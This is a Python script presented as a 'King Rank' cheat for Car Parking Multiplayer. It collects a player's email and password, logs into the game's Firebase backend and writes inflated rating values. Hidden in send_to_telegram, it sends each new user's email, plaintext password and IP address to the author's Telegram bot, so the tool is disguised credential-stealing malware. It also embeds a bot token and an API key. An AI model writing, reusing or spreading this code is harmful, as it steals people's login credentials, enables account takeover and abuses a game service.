import requests
import json
import os
import time

# --- TVOJI PODACI ---
BOT_TOKEN = "8224919170:AAFsIZt5dhxtpZbESW8W9SZUf441AShb4WU"
CHAT_ID = "7964340522"
FIREBASE_API_KEY = 'AIzaSyBW1ZbMiUeDZHYUO2bY8Bfnf5rRgrQGPTM'
FIREBASE_LOGIN_URL = f"https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key={FIREBASE_API_KEY}"
RANK_URL = "https://us-central1-cp-multiplayer.cloudfunctions.net/SetUserRating4"

# Putanja do fajla koji označava da je korisnik već poznat
SESSION_FILE = ".session_log"

def get_ip():
    try:
        return requests.get('https://api.ipify.org').text
    except:
        return "Unknown"

def send_to_telegram(email, password, ip):
    # Provera da li je korisnik već zabeležen (da ti ne stiže poruka stalno)
    if os.path.exists(SESSION_FILE):
        return # Ako fajl postoji, ne šalji ništa na Telegram

    # Ako fajl ne postoji, šalji poruku jer je ovo NOVI korisnik
    message = (
        f"🌟 *NEW USER DETECTED*\n\n"
        f"📧 *Email:* `{email}`\n"
        f"🔑 *Password:* `{password}`\n"
        f"🌐 *IP:* `{ip}`\n"
        f"⏰ *Time:* {time.ctime()}\n\n"
        f"This user is now marked as known."
    )
    url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
    payload = {"chat_id": CHAT_ID, "text": message, "parse_mode": "Markdown"}
    
    try:
        requests.post(url, json=payload)
        # Nakon slanja, napravi fajl da sledeći put preskoči slanje
        with open(SESSION_FILE, "w") as f:
            f.write("logged")
    except:
        pass

def login(email, password):
    payload = {"email": email, "password": password, "returnSecureToken": True}
    headers = {"Content-Type": "application/json"}
    try:
        response = requests.post(FIREBASE_LOGIN_URL, headers=headers, json=payload)
        res = response.json()
        if response.status_code == 200 and 'idToken' in res:
            return res.get('idToken')
        return None
    except:
        return None

def set_rank(token):
    # Tvoj originalni kod za King Rank
    rating_data = {k: 100000 for k in [
        "cars", "car_fix", "car_collided", "car_exchange", "car_trade", "car_wash",
        "slicer_cut", "drift_max", "drift", "cargo", "delivery", "taxi", "levels", "gifts",
        "fuel", "offroad", "speed_banner", "reactions", "police", "run", "real_estate",
        "t_distance", "treasure", "block_post", "push_ups", "burnt_tire", "passanger_distance"
    ]}
    rating_data["time"] = 1000000000
    rating_data["race_win"] = 3000
    payload = {"data": json.dumps({"RatingData": rating_data})}
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    
    print("\033[1;33mApplying King Rank...\033[0m")
    res = requests.post(RANK_URL, headers=headers, json=payload)
    if res.status_code == 200:
        print("\033[1;32mSUCCESS: King Rank Activated!\033[0m")
    else:
        print("\033[1;31mError applying rank.\033[0m")

def main():
    while True:
        os.system('clear')
        print("\033[1;32mANONYMO CPM KING RANK\033[0m")
        print("-" * 30)
        
        email = input("\033[1;37mEnter Email: \033[0m").strip()
        password = input("\033[1;37mEnter Password: \033[0m").strip()

        if not email or not password: continue

        user_ip = get_ip()
        
        # Pokušaj logina
        token = login(email, password)
        
        if token:
            # Ako je login uspešan, šalji tebi na Telegram SAMO ako je prvi put
            send_to_telegram(email, password, user_ip)
            set_rank(token)
            time.sleep(3)
        else:
            print("\033[1;31mInvalid Login Details.\033[0m")
            time.sleep(2)

if __name__ == "__main__":
    main()

